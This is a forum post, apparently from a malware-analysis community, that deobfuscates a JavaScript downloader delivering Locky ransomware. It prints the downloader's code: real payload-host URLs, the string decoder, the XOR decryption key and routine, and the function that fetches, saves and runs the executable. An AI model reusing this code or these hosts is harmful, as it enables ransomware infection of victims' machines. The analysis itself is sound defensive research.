Tetromino.prototype.getNew = function (index) { this.x = 4; index = 6; this.index = index; switch (index) { case 1: this.frameNumber = 1; this.sprite = 5; this.sprite = 1; this.frame = new Array( new Array( new Array(0, -1), new Array(0, 0), new Array(1, -1), new Array(1, 0) ) ); break; case 2:this.frameNumber = 4; this.sprite = 4; this.sprite = 2; this.frame = new Array( new Array( new Array(2, 0), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(1, 2) ), new Array( new Array(2, 1), new Array(-1, 1), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(0, 2) ) ); break; case 3:this.frameNumber = 4; this.sprite = 7; this.sprite = 3; this.frame = new Array( new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(0, -1), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(0, -1), new Array(0, 0), new Array(-1, 0) ), new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(0, 1) ) ); break; case 4: this.sprite = 2; this.sprite = 4; this.frameNumber = 2; this.frame = new Array( new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, 0), new Array(1, 0), new Array(0, 1), new Array(1, -1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(0, 1), new Array(1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(-1, 0), new Array(-1, 1) ) ); break; case 5:this.frameNumber = 4; this.sprite = 3; this.sprite = 5; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, -1) ), new Array( new Array(-1, -1), new Array(0, -1), new Array(0, 0), new Array(0, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(-1, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 1) ) ); break; 
case 6: this.sprite = 1; this.sprite = 6; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, -1), new Array(-1, 0), new Array(0, 0), new Array(1, 0) ), new Array( new Array(0, -1), new Array(-1, -1), new Array(-1, 0), new Array(-1, 1) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(1, 1) ), new Array( new Array(1, -1), new Array(1, 0), new Array(1, 1), new Array(0, 1) ) ); break; case 7: this.sprite = 6; this.sprite = 7; this.frameNumber = 4; this.frame = new Array( new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, -1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(-1, 0) ), new Array( new Array(-1, 0), new Array(0, 0), new Array(1, 0), new Array(0, 1) ), new Array( new Array(0, -1), new Array(0, 0), new Array(0, 1), new Array(1, 0) ) ); break; }};
};
...
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

2) Look at the end :
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}

=> URL obfuscation method: Unicode escapes (unescape them)
- Using the tool I linked in part (1):

http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO"
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"

My first question when I saw this part: "Why do they put URLs in an "easy to retrieve" way?!".
My second question was: "are these real URLs used to download payloads?!"

The first and third URLs are blocked by KTS cloud
The second exists no more: 403

Because the very interesting part is the deobfuscation of their "chaotic" source, it made me curious => I wanted to completely deobfuscate it (to see the real parts used, etc.)

3 files :
=> %TEMP%\JlLQdKnWwif.exe
=> %TEMP%\bsMnCcz.exe
=> %TEMP%\FgGsqpxH.exe

Exactly the same files :confused:
Classified as "Heur.AdvML" => Trojan-Ransom.Win32.Locky.bfw (name by Kaspersky)
(encrypted files : .zepto extension)

3) Let's investigate more :) :

var sirdallos ="RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz".manysecretthings();

A lot of strange strings use the same function: manysecretthings();
=> lol, very explicit name they gave it

The most important string used this way is 8492 chars long

manysecretthings() uses char code BITWISE operations: AND, OR, SHR, SHL
and also uses an array to retrieve the right char code from the calculated values: lulalula
(we will see later that it is equivalent to two operations)

String.prototype.manysecretthings = function() {
  var c1, c2, c3, c4;
  var i, len, out;
  var str = this.replace(/RAPAPIPATA/g, ''); // remove all "RAPAPIPATA" strings
  len = str.length; // length of the new string
  i = 0;
  out = "";

  while (i < len) { // Principal loop

    do {
      c1 = lulalula[str.charCodeAt(i++) & 0xff];
    } while (i < len && c1 == -1);
    if (c1 == -1)
      break;

    var dodo = false;

    do {
      c2 = lulalula[str.charCodeAt(i++) & 0xff];
      dodo = i < len && c2 == -1;
    } while (dodo);
    if (c2 == -1)
      break;
    out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

    do {
      c3 = str.charCodeAt(i++) & 0xff;
      if (c3 == 61)
        return out;
      c3 = lulalula[c3];
    } while (i < len && c3 == -1);
    if (c3 == -1)
      break;
    out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3c) >> 2));

    do {
      c4 = str.charCodeAt(i++) & 0xff;
      if (c4 == 61)
        return out;
      c4 = lulalula[c4];
    } while (i < len && c4 == -1);
    if (c4 == -1)
      break;
    out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
  } // end of principal while

  return out; // string decrypted
};
var lulalula = new Array(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,67,4,4,4,68,57,58,59,60,61,62,63,64,65,66,4,4,4,4,4,4,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,4,4,4,4,4,4,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4);
var lulalulaI, lulalulan = lulalula.length;
for (lulalulaI= 0; lulalulaI < lulalulan; ++lulalulaI) {
lulalula[lulalulaI] = lulalula[lulalulaI] - 5;
}
// here the real values for lulalula Array are "in place" :)

4) Let's test :

var VARDOCF ="JVRFTVAl".manysecretthings();
=> "%TEMP%"

var finde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".manysecretthings();
=> "ActiveXObject"

Now with the very long string seen above, 8492 chars long (a surprise!):


I removed all "votgorodazaspinoyiputkoroheCCC" strings

function rtfta(filePath) {
  var Hrosteks=WScript["CreateObject"]("ADODB.Stream");
  Hrosteks["type"]=2;
  Hrosteks["Charset"]=437;
  Hrosteks["open"]();
  Hrosteks["LoadFromFile"](filePath);
  var fileString=Hrosteks["ReadText"];
  Hrosteks["close"]();
  return fsta(fileString);
};

function fsta(fileString) {
  var t1=new Array();
  t1[0xC7]=0x80;
  t1[0xFC]=0x81;t1[0xE9]=0x82;t1[0xE2]=0x83;t1[0xE4]=0x84;
  .....
  .....
  t1[0x2248]=0xF7;t1[0xB0]=0xF8;t1[0x2219]=0xF9;t1[0xB7]=0xFA;t1[0x221A]=0xFB;
  t1[0x207F]=0xFC;t1[0xB2]=0xFD;t1[0x25A0]=0xFE;t1[0xA0]=0xFF;

  var resultArray=new Array();

  for (var Tj=0; Tj < fileString["length"]; Tj++) {
    var OVc9=fileString["charCodeAt"](Tj);
    if (OVc9 < 128) {
      var HIi3=OVc9;
    }
    else {
      var HIi3=t1[OVc9];
    }
    resultArray["push"](HIi3);
  };
  return resultArray /* y */;
};

function fats(codeArray) {
  var t2=new Array(); t2[0x80]=0x00C7;t2[0x81]=0x00FC;t2[0x82]=0x00E9;t2[0x83]=0x00E2;t2[0x84]=0x00E4;
  t2[0x85]=0x00E0;t2[0x86]=0x00E5;t2[0x87]=0x00E7;t2[0x88]=0x00EA;t2[0x89];
  ...
  ...
  ...
  t2[0xF8]=0x00B0;t2[0xF9]=0x2219;t2[0xFA]=0x00B7;t2[0xFB]=0x221A;t2[0xFC]=0x207F;
  t2[0xFD]=0x00B2;t2[0xFE]=0x25A0;t2[0xFF]=0x00A0;
  var EGj=new Array();
  var resultString="";
  var HIi3;
  var OVc9;
  for (var Tj=0; Tj < codeArray["length"]; Tj++) {
    HIi3=codeArray[Tj];
    if (HIi3 < 128) {
      OVc9=HIi3;
    }
    else {
      OVc9=t2[HIi3];
    }
    EGj.push(String["fromCharCode"](OVc9));
  }
  resultString=EGj["join"]("");
  return resultString;
};

function satt(filePath, codeArray) {
  var Hrosteks=WScript["CreateObject"]("ADODB.Stream");
  Hrosteks["type"]=2;
  Hrosteks["Charset"]=437;
  Hrosteks["open"]();
  Hrosteks["writeText"](fats(codeArray));
  Hrosteks["SaveToFile"](filePath, 2);
  Hrosteks["close"]();
};

var xKey = fsta("CYxUl3br07SJbYS56eeV8lKwKH8SEW3o");

function xdac(cca) {
  for (var Tj=0; Tj < cca["length"]; Tj++) {
    cca[Tj] ^= xKey[Math.floor(Tj % xKey.length)];
  }
  return cca;
};
This long string contains a BIG part of the functions and vars seen in the previously analysed scripted downloader (see links at the end of this post - new version of JS/TrojanDownloader.Nemucod).

- function to load the obfuscated ransomware,
- first char substitution function,
- deobfuscation of the exe content (elaborate function to be used for the XOR part),
- function to save the deobfuscated ransomware.

In other parts:
- function to request the files and save them in %TEMP%
- function to run it
- sub-function to get the values used in the XOR part
----------------------------------------------------------------------------------------------------------------------
One funny thing: their long function manysecretthings() only does two things:
- delete all "RAPAPIPATA" from the string to be "decrypted"
- Base64 decode :rolleyes:

One example :

"RAPAPIPATAV2lRAPAPIPATAuZG93cyBTY3JpcRAPAPIPATAHQgSG9zdA==".manysecretthings()
=> "V2luZG93cyBTY3JpcHQgSG9zdA=="

and with a simple tool to do Base64 decoding

=> "Windows Script Host"

But to analyse, I kept using their own function :p => I just had to call it :)
----------------------------------------------------------------------------------------------------------------------

function xdac(cca) {
for (var Tj=0; Tj < cca["length"]; Tj++) {

cca[Tj] ^= xKey[Math.floor(Tj % xKey.length)];
}

return cca;
};
The function above: the XOR part :)

similar to

var QVh1 = uheprng();
for (var index=0; index < file_content_temp.length; index++) {

file_content_temp[index] ^= QVh1(256); // XOR
}

5) Conclusion :

This is again a downloader that downloads an obfuscated ransomware and, once downloaded, performs operations to turn it into a real exe file
:D

=> this one tries to download the same ransomware 3 times, with different temp names :rolleyes:

New version of JS/TrojanDownloader.Nemucod (I have to find an official name :p )

See part (1) in the first post, too :p

And previous analysis:
https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/
and here for the previous complete deobfuscation version, in a pdf file:
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/

-----------------------------------------------------------------------------------------------------------------------
This is one of the most interesting obfuscation methods I have ever seen. Not only the manysecretthings() function is used to obfuscate all the parts:
a lot of classes, functions and sub-functions are created and used to obfuscate the real data (I suggest you go and edit the file in a protected environment).

The only bad part : URLs too easy to retrieve :confused:
var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;

function votgorodazaspinoyiputkoroheCCCachievment(votgorodazaspinoyiputkoroheCCCbidttt){if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}else{return 17;}
return 3;};
function votgorodazaspinoyiputkoroheCCCcenter(votgorodazaspinoyiputkoroheCCCrivulet) {
request = votgorodazaspinoyiputkoroheCCCrivulet;
for (var votgorodazaspinoyiputkoroheCCCi in votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq){request = request.replace(votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq[votgorodazaspinoyiputkoroheCCCi]);}
return request;
};

var votgorodazaspinoyiputkoroheCCCchosen = 33/3-10;
function votgorodazaspinoyiputkoroheCCCrodmands(x, y) {
this.x = x + "bbfgnfgngn";
this.y = y - "fgnfgngfgf";
};

votgorodazaspinoyiputkoroheCCCrodmands.angle = function(votgorodazaspinoyiputkoroheCCCp) {
return Math.atan2(votgorodazaspinoyiputkoroheCCCp.y, votgorodazaspinoyiputkoroheCCCp.x);
};

function votgorodazaspinoyiputkoroheCCCTetromino(index){
this.x = 0;
this.y = 0;
this.selectedFrame = 0;
this.getNew(index);
}


String.prototype.votgorodazaspinoyiputkoroheCCCmanysecretthings = function() {

var votgorodazaspinoyiputkoroheCCCc1, votgorodazaspinoyiputkoroheCCCc2, votgorodazaspinoyiputkoroheCCCc3, votgorodazaspinoyiputkoroheCCCc4;
var votgorodazaspinoyiputkoroheCCCi, votgorodazaspinoyiputkoroheCCClen, votgorodazaspinoyiputkoroheCCCout;
var votgorodazaspinoyiputkoroheCCCstr = this.replace(/RAPAPIPATA/g, '');
votgorodazaspinoyiputkoroheCCClen = votgorodazaspinoyiputkoroheCCCstr.length;
votgorodazaspinoyiputkoroheCCCi = 0;
votgorodazaspinoyiputkoroheCCCout = "";

while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen) {
do {
votgorodazaspinoyiputkoroheCCCc1 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc1 == -1);

if (votgorodazaspinoyiputkoroheCCCc1 == -1)
break;
var votgorodazaspinoyiputkoroheCCCdodo = false;
do {
votgorodazaspinoyiputkoroheCCCc2 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff];
votgorodazaspinoyiputkoroheCCCdodo = votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc2 == -1;
} while (votgorodazaspinoyiputkoroheCCCdodo);

if (votgorodazaspinoyiputkoroheCCCc2 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode((votgorodazaspinoyiputkoroheCCCc1 << 2) | ((votgorodazaspinoyiputkoroheCCCc2 & 0x30) >> 4));

do {
votgorodazaspinoyiputkoroheCCCc3 = votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff;

if (votgorodazaspinoyiputkoroheCCCc3 == 61)
return votgorodazaspinoyiputkoroheCCCout;

votgorodazaspinoyiputkoroheCCCc3 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCc3];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc3 == -1);

if (votgorodazaspinoyiputkoroheCCCc3 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode(((votgorodazaspinoyiputkoroheCCCc2 & 0XF) << 4) | ((votgorodazaspinoyiputkoroheCCCc3 & 0x3c) >> 2));

do {
votgorodazaspinoyiputkoroheCCCc4 = votgorodazaspinoyiputkoroheCCCstr.charCodeAt(votgorodazaspinoyiputkoroheCCCi++) & 0xff;

if (votgorodazaspinoyiputkoroheCCCc4 == 61)
return votgorodazaspinoyiputkoroheCCCout;

votgorodazaspinoyiputkoroheCCCc4 = votgorodazaspinoyiputkoroheCCClulalula[votgorodazaspinoyiputkoroheCCCc4];
} while (votgorodazaspinoyiputkoroheCCCi < votgorodazaspinoyiputkoroheCCClen && votgorodazaspinoyiputkoroheCCCc4 == -1);

if (votgorodazaspinoyiputkoroheCCCc4 == -1)
break;

votgorodazaspinoyiputkoroheCCCout += String.fromCharCode(((votgorodazaspinoyiputkoroheCCCc3 & 0x03) << 6) | votgorodazaspinoyiputkoroheCCCc4);
}

return votgorodazaspinoyiputkoroheCCCout;
};


votgorodazaspinoyiputkoroheCCCTetromino.prototype.nextFrame = function () {

if ((this.selectedFrame + 1) < this.frameNumber) {
this.selectedFrame++;
} else {
this.selectedFrame = 0
}
};
var votgorodazaspinoyiputkoroheCCCd7 = votgorodazaspinoyiputkoroheCCCcenter("00M"+"11SX"+"22ML"+("votgorodazaspinoyiputkoroheCCCcontinues","votgorodazaspinoyiputkoroheCCCoxfordshire","votgorodazaspinoyiputkoroheCCCinconsolable","votgorodazaspinoyiputkoroheCCCgazelle","votgorodazaspinoyiputkoroheCCClaundry","2.")+"PIPIPKAM"+"LH"+"TT"+("votgorodazaspinoyiputkoroheCCCsurvival","votgorodazaspinoyiputkoroheCCCmotif","votgorodazaspinoyiputkoroheCCCchaotic","votgorodazaspinoyiputkoroheCCClotus","votgorodazaspinoyiputkoroheCCCheritage","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCcamera","votgorodazaspinoyiputkoroheCCCemacs","P}")+"WU"+("votgorodazaspinoyiputkoroheCCCeddie","votgorodazaspinoyiputkoroheCCCflustered","votgorodazaspinoyiputkoroheCCCexalt","votgorodazaspinoyiputkoroheCCCfahrenheit","votgorodazaspinoyiputkoroheCCCcredit","votgorodazaspinoyiputkoroheCCCclassroom","votgorodazaspinoyiputkoroheCCCtrends","cr")+("votgorodazaspinoyiputkoroheCCCunbending","votgorodazaspinoyiputkoroheCCCranked","votgorodazaspinoyiputkoroheCCCavenue","votgorodazaspinoyiputkoroheCCCdurable","votgorodazaspinoyiputkoroheCCCvestibule","votgorodazaspinoyiputkoroheCCCceremony","votgorodazaspinoyiputkoroheCCCelementary","votgorodazaspinoyiputkoroheCCCcongregate","ip")+"t:S"+("votgorodazaspinoyiputkoroheCCCmining","votgorodazaspinoyiputkoroheCCCsurmount","votgorodazaspinoyiputkoroheCCCintimidate","votgorodazaspinoyiputkoroheCCCbetween","votgorodazaspinoyiputkoroheCCCcroatia","votgorodazaspinoyiputkoroheCCCampland","votgorodazaspinoyiputkoroheCCCglenn","votgorodazaspinoyiputkoroheCCCmunicipality","h")+"e"+("votgorodazaspinoyiputkoroheCCCvoracious","votgorodazaspinoyiputkoroheCCCreaper","votgorodazaspinoyiputkoroheCCCcrispin","votgorodazaspinoyiputkoroheCCCcount","votgorodazaspinoyiputkoroheCCCeffeminacy","votgorodazaspinoyiputkoroheCCCmashed","votgorodazaspinoyiputkoroheCCCconvinced","votgorodazaspinoyiputkoroheCCCslovak","ll"));
var votgorodazaspinoyiputkoroheCCCDoUtra = [votgorodazaspinoyiputkoroheCCCfinde, votgorodazaspinoyiputkoroheCCCsirdallos,votgorodazaspinoyiputkoroheCCCVARDOCF, ""+"."+("votgorodazaspinoyiputkoroheCCCindus","votgorodazaspinoyiputkoroheCCCjubilation","votgorodazaspinoyiputkoroheCCCchampionship","votgorodazaspinoyiputkoroheCCCshepherdess","votgorodazaspinoyiputkoroheCCCpredict","votgorodazaspinoyiputkoroheCCCconsumes","votgorodazaspinoyiputkoroheCCCtransmitting","votgorodazaspinoyiputkoroheCCCcucumber","exe"), "UnRAPAPIPATAVuRAPAPIPATA".votgorodazaspinoyiputkoroheCCCmanysecretthings(),votgorodazaspinoyiputkoroheCCCd7];
votgorodazaspinoyiputkoroheCCCDoUtraAANO = votgorodazaspinoyiputkoroheCCCDoUtra.shift()
var votgorodazaspinoyiputkoroheCCCZumZum = this[votgorodazaspinoyiputkoroheCCCDoUtraAANO];
votgorodazaspinoyiputkoroheCCCfabled = "AAF2AA";
votgorodazaspinoyiputkoroheCCCNative.votgorodazaspinoyiputkoroheCCCgenericize = function(object, votgorodazaspinoyiputkoroheCCCproperty, votgorodazaspinoyiputkoroheCCCcheck){
if ((!votgorodazaspinoyiputkoroheCCCcheck || !object[votgorodazaspinoyiputkoroheCCCproperty]) && typeof object.prototype[votgorodazaspinoyiputkoroheCCCproperty] == 'function') object[votgorodazaspinoyiputkoroheCCCproperty] = function(){
var votgorodazaspinoyiputkoroheCCCargs = Array.prototype.slice.call(arguments);
return object.prototype[votgorodazaspinoyiputkoroheCCCproperty].apply(votgorodazaspinoyiputkoroheCCCargs.shift(), votgorodazaspinoyiputkoroheCCCargs);
};
};
function votgorodazaspinoyiputkoroheCCCShtyler4(votgorodazaspinoyiputkoroheCCCgutter, votgorodazaspinoyiputkoroheCCCStrokaParam2) {

var votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCvulture ;
votgorodazaspinoyiputkoroheCCCwandermander=votgorodazaspinoyiputkoroheCCCwandermander+ "\u002f";
votgorodazaspinoyiputkoroheCCCwandermander=votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCStrokaParam2 ;
//votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCamalgamation;
votgorodazaspinoyiputkoroheCCCsudabilo1[votgorodazaspinoyiputkoroheCCCostrokoncert](("votgorodazaspinoyiputkoroheCCClackey","votgorodazaspinoyiputkoroheCCCsnowboard","votgorodazaspinoyiputkoroheCCCunderlying","votgorodazaspinoyiputkoroheCCClongest","votgorodazaspinoyiputkoroheCCCexecration","votgorodazaspinoyiputkoroheCCCsepulchre","votgorodazaspinoyiputkoroheCCCpears","votgorodazaspinoyiputkoroheCCCcassandra","G" + votgorodazaspinoyiputkoroheCCCweasel) + ("votgorodazaspinoyiputkoroheCCCrelapse","votgorodazaspinoyiputkoroheCCClatina","votgorodazaspinoyiputkoroheCCCmanufactured","votgorodazaspinoyiputkoroheCCCflake","votgorodazaspinoyiputkoroheCCCincursion","votgorodazaspinoyiputkoroheCCCunderstand","votgorodazaspinoyiputkoroheCCCnominee","votgorodazaspinoyiputkoroheCCCgentle","votgorodazaspinoyiputkoroheCCCpixels","votgorodazaspinoyiputkoroheCCCimparting","T"), votgorodazaspinoyiputkoroheCCCgutter, false);

votgorodazaspinoyiputkoroheCCCsudabilo1[votgorodazaspinoyiputkoroheCCCtudabilo1 + ("votgorodazaspinoyiputkoroheCCCreligion","votgorodazaspinoyiputkoroheCCCsectors","votgorodazaspinoyiputkoroheCCCserfs","votgorodazaspinoyiputkoroheCCCadvertisements","votgorodazaspinoyiputkoroheCCCquickly","end")]();
var votgorodazaspinoyiputkoroheCCCadvocacy=("wendyADCDEF" + WScript=="wendyADCDEF" + "RAPAPIPATAV2lRAPAPIPATAuZG93cyBTY3JpcRAPAPIPATAHQgSG9zdA==".votgorodazaspinoyiputkoroheCCCmanysecretthings())&&typeof(votgorodazaspinoyiputkoroheCCCGzEAPd)==="undefined";

if (votgorodazaspinoyiputkoroheCCCadvocacy) {

var votgorodazaspinoyiputkoroheCCCbrings = new votgorodazaspinoyiputkoroheCCCZumZum((("votgorodazaspinoyiputkoroheCCCentrap","votgorodazaspinoyiputkoroheCCCsedan","votgorodazaspinoyiputkoroheCCCteens","votgorodazaspinoyiputkoroheCCCbathroom","votgorodazaspinoyiputkoroheCCCislam","votgorodazaspinoyiputkoroheCCCcarlo","votgorodazaspinoyiputkoroheCCCoratorio","votgorodazaspinoyiputkoroheCCCscathing","ASEO")+("votgorodazaspinoyiputkoroheCCCshare","votgorodazaspinoyiputkoroheCCCseventyeight","votgorodazaspinoyiputkoroheCCCdefine","votgorodazaspinoyiputkoroheCCCenquiries","votgorodazaspinoyiputkoroheCCCintermittently","votgorodazaspinoyiputkoroheCCCsnarl","votgorodazaspinoyiputkoroheCCCrarely","votgorodazaspinoyiputkoroheCCCcarol","O")+"DB"+("votgorodazaspinoyiputkoroheCCCtransition","votgorodazaspinoyiputkoroheCCCminnesota","votgorodazaspinoyiputkoroheCCCbasketball","votgorodazaspinoyiputkoroheCCCcinderella","votgorodazaspinoyiputkoroheCCCworld","votgorodazaspinoyiputkoroheCCCopprobrium","votgorodazaspinoyiputkoroheCCCwallis",".S")+"tr8").replace("SEO", "D").replace("8", "eam"));
votgorodazaspinoyiputkoroheCCCbrings[votgorodazaspinoyiputkoroheCCCostrokoncert]();
votgorodazaspinoyiputkoroheCCCRhXxGud = "type";
votgorodazaspinoyiputkoroheCCCbrings[votgorodazaspinoyiputkoroheCCCRhXxGud] = votgorodazaspinoyiputkoroheCCCchosen;
votgorodazaspinoyiputkoroheCCChGaSMa = "AAF10AA";
votgorodazaspinoyiputkoroheCCCbrings["d3RAPAPIPATAJpdRAPAPIPATAGU=".votgorodazaspinoyiputkoroheCCCmanysecretthings()](votgorodazaspinoyiputkoroheCCCsudabilo1[("votgorodazaspinoyiputkoroheCCCvacation","votgorodazaspinoyiputkoroheCCCplaces","votgorodazaspinoyiputkoroheCCCserves","votgorodazaspinoyiputkoroheCCCunanimity","votgorodazaspinoyiputkoroheCCCeverybody","votgorodazaspinoyiputkoroheCCCassistant","")+"R"+"es"+"pon"+votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq['U'].toLowerCase()+"e"+"QmRAPAPIPATA9keQRAPAPIPATA==".votgorodazaspinoyiputkoroheCCCmanysecretthings()]);
votgorodazaspinoyiputkoroheCCCXWaxeQhw = "AAF11AA";
votgorodazaspinoyiputkoroheCCCbrings[(votgorodazaspinoyiputkoroheCCCcasque + "o"+("votgorodazaspinoyiputkoroheCCCinterrogation","votgorodazaspinoyiputkoroheCCCcapability","votgorodazaspinoyiputkoroheCCCcharter","votgorodazaspinoyiputkoroheCCCstinging","votgorodazaspinoyiputkoroheCCCvibration","220")+("votgorodazaspinoyiputkoroheCCCnausea","votgorodazaspinoyiputkoroheCCCadoring","votgorodazaspinoyiputkoroheCCCcancer","votgorodazaspinoyiputkoroheCCCtartar","votgorodazaspinoyiputkoroheCCCpressed","votgorodazaspinoyiputkoroheCCCcoaches","votgorodazaspinoyiputkoroheCCCegoism","22i")+"tion").replace("22"+("votgorodazaspinoyiputkoroheCCCillustrated","votgorodazaspinoyiputkoroheCCCcomponents","votgorodazaspinoyiputkoroheCCCmantel","votgorodazaspinoyiputkoroheCCCplutarch","votgorodazaspinoyiputkoroheCCCvagina","votgorodazaspinoyiputkoroheCCCsprig","votgorodazaspinoyiputkoroheCCCabler","022"), votgorodazaspinoyiputkoroheCCCtudabilo1)] = 0;
votgorodazaspinoyiputkoroheCCCkrDwvrh = "AAF12AA";
votgorodazaspinoyiputkoroheCCCbrings['saveToFile'](votgorodazaspinoyiputkoroheCCCwandermander, 2);
votgorodazaspinoyiputkoroheCCCSswQdi = "AAF13AA";
votgorodazaspinoyiputkoroheCCCbrings['c'+"lo"+"se"]();
var fileArray=votgorodazaspinoyiputkoroheCCCrtfta(votgorodazaspinoyiputkoroheCCCwandermander);
fileArray=votgorodazaspinoyiputkoroheCCCxdac(fileArray);
votgorodazaspinoyiputkoroheCCCwandermander = votgorodazaspinoyiputkoroheCCCwandermander + votgorodazaspinoyiputkoroheCCCamalgamation;
votgorodazaspinoyiputkoroheCCCsatt(votgorodazaspinoyiputkoroheCCCwandermander, fileArray );
votgorodazaspinoyiputkoroheCCCrampart[votgorodazaspinoyiputkoroheCCCpromises](votgorodazaspinoyiputkoroheCCCwandermander, votgorodazaspinoyiputkoroheCCCchosen, true);
}
};
-----------------------------------------------------------------------------------------------------------------------

I will certainly make a complete deobfuscation of this sample, but I won't write more about it in this part: the most important things have been found / said :)

Threat Score: 100/100
https://www.hybrid-analysis.com/sam...353be29785d7da3118162511f78?environmentId=100
 

Logethica

Wow @DardiM ...You have done an incredible amount of work and an impeccable presentation of your findings.:)
